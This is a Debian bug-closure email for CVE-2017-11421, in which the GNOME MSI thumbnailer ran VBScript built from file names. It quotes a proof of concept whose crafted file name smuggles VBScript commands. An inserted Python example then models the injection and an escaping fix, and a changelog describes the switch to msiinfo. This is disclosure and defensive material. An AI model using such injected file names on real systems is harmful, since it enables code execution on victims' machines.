Your message dated Sat, 12 Aug 2017 16:17:09 +0000
with message-id <e1dgz65-0008id...@fasolo.debian.org>
and subject line Bug#868705: fixed in gnome-exe-thumbnailer 0.9.4-2+deb9u1
has caused the Debian Bug report #868705,
regarding gnome-exe-thumbnailer: CVE-2017-11421: Thumbnail generation for MSI files executes arbitrary VBScript
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
868705: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=868705
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: gnome-exe-thumbnailer
Version: 0.9.4-2
Severity: grave
Tags: security
Justification: user security hole

Dear Maintainer,

The following PoC is copied verbatim from my post about the parsing issue:
http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html

Proof of Concept

Install Dependencies

On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and 
wixl. The wixl package is only needed to create MSI files that trigger the 
thumbnailer.

If the proof of concept does not work, install winetricks and run winetricks 
wsh56 to upgrade the Windows Script Host.

Create MSI Files

Create a file named poc.xml with the following content:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Version="1.0"/>
</Wix>

Execute the following Bourne Shell code:

wixl -o poc.msi poc.xml
cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

Trigger Execution

Start GNOME Files and navigate to the folder with the MSI files. An empty file 
with the name badtaste.txt should appear.



-- System Information:
Debian Release: 9.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages gnome-exe-thumbnailer depends on:
ii  icoutils                         0.31.2-1.1
ii  imagemagick                      8:6.9.7.4+dfsg-11
ii  imagemagick-6.q16 [imagemagick]  8:6.9.7.4+dfsg-11
ii  libglib2.0-bin                   2.50.3-2

Versions of packages gnome-exe-thumbnailer recommends:
pn  wine                                                                 <none>
pn  wine64-tools | wine32-tools | wine64-development-tools | wine32-dev  <none>

gnome-exe-thumbnailer suggests no packages.

-- no debconf information

--- End Message ---
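How the file name in the report above turns into code, as an added example that is not part of the bug report or of the gnome-exe-thumbnailer package: the VBScript template, the helper names and the msiinfo subcommand syntax are assumptions, chosen to match the shape of the PoC; the page's actual fix drops script generation entirely in favour of msiinfo.

```python
# Added example: models the injection class behind CVE-2017-11421, a file
# name pasted into a VBScript string literal without escaping. The template
# below is a hypothetical stand-in shaped like the PoC, not the package's
# real script; helper names are mine.
# Hypothetical generator template: the path lands between the quotes.
TEMPLATE = ('Set inst=CreateObject("WindowsInstaller.Installer"):'
            'Set db=inst.OpenDatabase({path},0)')

# The PoC file name from the report, written here as a Python literal.
POC_NAME = ('poc.msi",0):Set fso=CreateObject("Scripting.FileSystemObject"):'
            'Set poc=fso.CreateTextFile("badtaste.txt")\'.msi')

def build_unsafe(path: str) -> str:
    """Pre-fix behaviour: wrap the raw name in quotes by concatenation."""
    return TEMPLATE.format(path='"' + path + '"')

def vbs_literal(s: str) -> str:
    """VBScript writes a quote char inside a literal as two quote chars."""
    return '"' + s.replace('"', '""') + '"'

def build_escaped(path: str) -> str:
    """Same template, but the name can no longer close the literal."""
    return TEMPLATE.format(path=vbs_literal(path))

def count_statements(script: str) -> int:
    """Count statements on one VBScript line: ':' outside a string literal
    separates statements and an apostrophe outside one starts a comment."""
    count, in_string = 1, False
    for ch in script:
        if ch == '"':
            in_string = not in_string  # a doubled quote toggles twice
        elif not in_string:
            if ch == ':':
                count += 1
            elif ch == "'":
                break
    return count

def msiinfo_argv(path: str) -> list:
    """What the fixed package does instead: hand the path to msiinfo as one
    argv element, so no script text is built. Subcommand syntax assumed."""
    return ["msiinfo", "export", path, "Property"]

def name_is_suspicious(name: str) -> bool:
    """Defender check: a quote char in a file name only matters to
    generators that interpolate it; flag such names for review."""
    return '"' in name
```

With the PoC name, the unescaped script grows from two statements to four before the apostrophe comments out the remainder; the escaped and argv forms keep it inert.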
--- Begin Message ---
Source: gnome-exe-thumbnailer
Source-Version: 0.9.4-2+deb9u1

We believe that the bug you reported is fixed in the latest version of
gnome-exe-thumbnailer, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 868...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
James Lu <bitfl...@gmail.com> (supplier of updated gnome-exe-thumbnailer 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)



Format: 1.8
Date: Tue, 25 Jul 2017 07:28:41 -0700
Source: gnome-exe-thumbnailer
Binary: gnome-exe-thumbnailer
Architecture: source
Version: 0.9.4-2+deb9u1
Distribution: stretch
Urgency: high
Maintainer: Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>
Changed-By: James Lu <bitfl...@gmail.com>
Description:
 gnome-exe-thumbnailer - Wine .exe and other executable thumbnailer for GNOME
Closes: 868705
Changes:
 gnome-exe-thumbnailer (0.9.4-2+deb9u1) stretch; urgency=high
 .
   * Add patch switch-to-msiinfo.patch:
     - Switch to msitools' msiinfo for ProductVersion fetching, replacing the
       insecure VBScript-based parsing as described at
       http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
       (Closes: #868705; LP: #651610; CVE-2017-11421)
   * Add msitools to recommends; it is now used to fetch .msi version info.
   * Add patch fix-version-label-readability.patch backported from
     https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1cf4df81836985d9660f950287232b3255ee17bb
     to fix unreadable white-on-white text on version labels.


--- End Message ---
_______________________________________________
pkg-wine-party mailing list
pkg-wine-party@lists.alioth.debian.org
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party
